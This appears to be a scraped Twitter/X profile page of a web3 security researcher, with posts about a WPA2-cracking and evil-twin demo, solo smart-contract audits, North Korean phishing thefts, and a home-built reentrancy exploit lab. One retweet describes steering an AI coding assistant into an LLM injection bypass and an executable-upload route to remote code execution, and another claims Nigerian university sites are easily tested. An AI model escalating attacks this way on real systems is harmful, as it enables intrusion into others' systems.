Olivia
Online
0xR0bu5t^~^
@mrR0bust
...just a cool guy 😎satisfying his curiosity
|| Smart Contracts Only ||
Offensive Security 🏴☠️ || Web3 Auditor
Blockchain
Joined March 2020
240 Following
234 Followers
808 Posts
Pinned Tweet
HACKING #like THE FBI ??
In 2005 the Federal Bureau of Investigation (@FBI ) cracked WEP (Wired Equivalent Privacy) passwords in minutes using freely available software. This was done publicly, in an effort to increase #Awareness of WEP's weaknesses(vulnerabilities).
I was opportuned to emulate a similar demonstration at the ‘STAY AHEAD OF THE HACK EVENT ‘ hosted by @cloud_mavinCC this #CybersecurityAwarenessMonth, but only this time I managed to cracked WPA2 (Wi-Fi Protected Access ll ) passwords in minutes…also, I demonstrated a social engineering attack known as ‘EVIL TWIN’.
N.B: WPA2 was an initial replacement for both WEP and WPA.
I'm currently on tweeting break but I've also been learning/building in silence and studying my Bible too!
Will let the planet know when it's completely shipped.
🤯CODE4RENA SUNSETTING. THE END OF AN ERA
Thank you for everything, code4rena, forever in our hearts <3
I made $600k USDC in ~20 months of doing solo smart contract security audits ('23-'24)
It all started when I was reading the Uniswap V2/V3 docs. I saw some whitehat (now OG in the space, @samczsun) had done a "solo" audit for them.
I was like "what? Solo audit? How good must have he been, so that he can do audits just by himself?". I felt motivated and impressed, but I was just starting out still, so I moved forward and forgot about it.
I started actively posting my journey on X - public learning for web3 security. I did some contests on code4rena/Sherlock and had a busy calendar to do every contest possible. One of my posts gathered attention, and I got a comment.
"Would you do a review for me? DM".
I did an "audit" for $600 USDC for 6 hours of work. Found 2 High and 2 Medium severity issues. Made a PDF report. The dev was very happy with the work. I published on socials - got a second comment/DM and did a second solo audit.
From then I went on to do 50+ solo audits and make $600k, working all by myself, so having pretty much 100% profit. Bought a few nice things, upgraded my lifestyle a bit, but I also truly fell inlove with ethical hacking and building sustainable businesses - creating long-term value for all parties involved.
That's how I started Pashov Audit Group, my current web3 security audits company, where we secured many many many billions of dollars for blockchain projects. Been a fun journey, but I am far from satisfied.
I will be using crypto my whole life, my wife and my kids will be using it, and their wives/husbands and kids. It's a long-term thing. That's why short term profit isn't something I get excited about. I'm a long-term thinker, and the only way to prove it is to keep going. Ending this year on a positive note - 2026 will be huge for all of us🔥
If you liked the story, Retweet and leave a comment about it, I'll make sure to respond to the good ones🫡
Tip of the day:
To temporarily hold back sneezing in public or hiding?
Press your tongue hard... against the back of your lower teeth.
It works like magic! 🪄
I just want to say this.
Every Nigerian federal University website (running on WP) should check their system.
I just did some tests and sincerely, all it takes is a little effort from any bored tester.
North Korea has stolen over $3 billion from crypto.
Not by breaking cryptography.
Not by finding exotic zero-days in Solidity.
By sending fake job offers on LinkedIn to developers with privileged access.
One developer. One malicious PDF. Months of patience.
$625M gone from Ronin.
$1.5B gone from Bybit.
Your smart contract is audited.
Your team's inbox is not.
When did you last brief your team on this specific attack vector?
What is stopping Ghana and Nigeria from having the Secret Service?
The secret service are so organized🤍🫡
@maigadohcrypto It will pay off someday! Inshallah 🙏🏻
Gm everyone, i will always love web3 security research, you?
Three audits. No bug bounty. AI-powered security scanner.
vs.
One audit. $500K active bounty. No AI tools.
The second protocol is safer. Not even close.
AI scanners find what they were trained on. Bug bounties incentivize people to find what nobody has thought of yet.
You cannot train a model on the vulnerability that hasn't been discovered yet. You can pay a researcher to find it.
@adeolRxxxx Ball park figure?
5k lines of @LayerZero_Core zero findings
turns out "intended behavior" is doing a lot of heavy lifting in that codebase 😭
how can there be a bug if everything is a design choice 🙂🔒
Who is hacking manually still?
I finally seem to have a working AI bug hunter setup.
All findings using Claude Code with Opus 4.7.
Got a few duplicates but seems like the workflow is working in the right direction now.
Two interesting findings I had on one program:
- LLM Injection - My first LLM injection. Initially Claude Code flagged it and discarded it saying it's LLM injection, as if it's an invalid bug 😄. I had to ask it to focus on LLM injections and it was easily able to bypass it. Seems like there were no filters for LLM injection. But the workflow didn't have any MCP or tools so impact was not much.
- RCE on Windows machine - It found an image proxy where user can control file names. It suggested it's a low finding and only thing we can do is defame the company by uploading malicious images with malicious names. Then I asked if we can control images we should be able to bypass it to upload executables, and it was able to find a full workflow to bypass the image check and upload a Windows executable which will be served from target owned image proxy and run on Windows machines to achieve RCE.
All I can say is "It's been God".
There were days I felt like "not showing up". Days I wanted to give up, but here we are. Still at it. Pushing. Praying 🤲🏾. Dreaming 🧎🏻♂️and Working BTS.
Each day brings me closer to my goal 🎯.
Still$0 made, but it will pay off someday.
#BLOCKCHAIN JOURNEY 👣 Week 7.
After a week of no #Web3. No Chess. No Workout.
I'm back at it again. This time even more Robust (Strong & Healthy).
Focus: Cryptography
P.S:To Excel in this field you must have a well-to-do knowledge about Mathematics.
UPDATE ON MY #Blockchain JOURNEY weeks 5&6;
I realize I did say I was going on a little break... However that was a break from posting (tweeting) on here. Never really took a break from learning #Web3, that alone is enough to probably drive me into boredom.
The last few weeks were spent on rigorous learning of Solidity and practicing (observation and application of the art of "learning by doing")
During this period, I've been able to build from scratch a #Web3 Practice Lab with everything I need including a few smart contracts for testing rentrancy and access control vulnerabilities (Coming to GitHub 🔜). I achieved this with the help of Foundary framework, which made life a lot easier for me.
I built the following smart contracts;
1. A lockup contract(vulnerable mindset) with an unlock time. Where the contract's balance can only be withdrawn by the beneficiary when block.timestamp > unlockTime. This vulnerable contract was deliberately programmed to trusts user input blindly.
Apparently the idea was inspired by a real world audit target, as I was bug hunting during this same timeframe.
My focus was on finding ways to exploit the "withdraw" function (no reentrancy lock🔒).
I found ways to inject a malicious token, then trigger a callback afterwards (this didn't end well).
I also tried exploiting the access controls.
e.g require msg.sender == beneficiary
require block.timestamp > unlockTime
I believe the above two restrictions were implemented to ensure that until one year after system deployment, tokens originating from the deployer cannot
enter circulating supply and cannot be staked to earn system revenue.
Moreover, they also ensure that only an eligible beneficiary can withdraw from the smart contract.
Furthermore, I went on to Adding a vulnerable prototype of this Lockup contract to my Lab; to practicalize, test and provide proof of concepts.
2. Built an Evil token contract, which I used in funding the Lockup contract.
3. Built an Attacker's contract that executes the overall attack.
For demo purposes I did the following;
1. Set EvilToken as token
2. Set EvilToken as beneficiary
3. Set unlockTime in past or fast forward time.
Lastly, I wrote a bash script(Coming to GitHub 🔜) that does all of the setup for me, without me needing to execute each command individually. This saved me a lot of time.
The whole experience was fun and exciting, plus I enjoyed watching the flow of funds being drained from the Vulnerable contract account to Attacker's, and transactions being broadcasted on the anvil local testnet (#Blockchain).
Oh, why wouldn't you love #Web3?
Join me on this journey and together we'd explore the powers of a "programmable decentralized Blockchain, controlling money 💰".
Final takeaways;
Reentrancy is NOT just about callbacks;
It’s about:
1. Who starts the call.
2. Who reenters.
3. Who passes access control.
While my submission to my target 🎯 (which also happens to be my first) turned out to be "invalid", I did learn a lot from my target, because unlike the vulnerable contract, my audit target actually validates everything by preventing the following;
Our exploit lab setup ❌
Time bypass ❌
Arbitrary token injection;
The contract is tightly coupled to a specific token system. Not just ANY ERC20.
I believe I am very close to my first valid finding on #Web3, I really can't wait for that moment.
I've always had a strong belief that someday; the time spent on debugging, researching, fuzzing and reading #code, won't go to waste—eventually. 🥱
#Godspeed!
https://t.co/wUbLnPjSBj
Day 6:
Studied the various elliptic curve libraries and implementations of the secp256k1.
Learnt cryptographic hash functions and Hex Encoding with Checksum in Capitalization (ERC-55)... how it solves the mixed capitalization problem.
Last Seen Users on Sotwe
🅣🅗🅔_🅑🅛🅐🅒🅚_🅠🅤🅔🅔🅝
Seen from United States
Ray Potts™️ NYC 🗽(6/26-6/29) 
Seen from United States
ANIN
Seen from Malaysia
GTA 6 Countdown ⏳
Seen from Brazil
🔥( o ) ( o )🔥
Seen from Ukraine
uhhhh
Seen from Malaysia
zxcaar
Seen from Turkey
ماستر
Seen from Egypt
gilaabis
Seen from Indonesia
memo
Seen from United States
Most Popular Users
Elon Musk
@elonmusk
240.6M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.4M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.9M followers
KATY PERRY
@katyperry
87.5M followers
Taylor Swift
@taylorswift13
81.4M followers
Lady Gaga
@ladygaga
72.9M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.7M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.8M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62.4M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.6M followers